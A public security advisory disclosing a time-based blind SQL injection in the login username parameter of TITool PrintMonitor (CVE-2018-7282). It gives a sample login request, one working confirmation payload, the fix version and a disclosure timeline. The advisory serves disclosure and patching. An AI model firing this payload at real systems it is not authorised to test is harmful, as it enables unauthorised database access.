# Title: TITool PrintMonitor Blind-SQL Injection
# Date: 12/05/2019
# Vendor Homepage: www.titool.eu
# Version: TITool PrintMonitor prior to PM18.2.1
# Author: fenceposterror <fenceposterr@gmail.com>
# CVE : 2018-7282
# CVSS v3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:F/RL:O/RC:C/CR:X/IR:X/AR:X/MAV:X/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:L/MA:N
# CVSS Base Score: 6.5

Introduction:
-------------
PrintMonitor collects activities on the devices. 

Affected:
---------
TITool PrintMonitor prior to PM18.2.1

Technical Description:
----------------------
The username parameter during the login request is vulnerable to and/or time-based blind SQLi.

A valid request:

POST /login.php HTTP/1.1
Host: vulnerable.host.tld
Content-Length: 41
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Referer: http://vulnerable.host.tld/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

username=admin&password=admin&language=en

Attack Payload for confirmation:

username=admin') AND 4197=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- nVTH&password=admin&language=en

Fix:
----
Upgrade to PM18.2.1.

Timeline:
---------
2018-02-19 Discovery
2018-02-20 Initial vendor contact
2018-02-20 Initial vendor response
2018-02-21 CVE requested
2018-05-22 Request update from vendor
2018-05-23 Fix version provided
2019-12-05 Release public info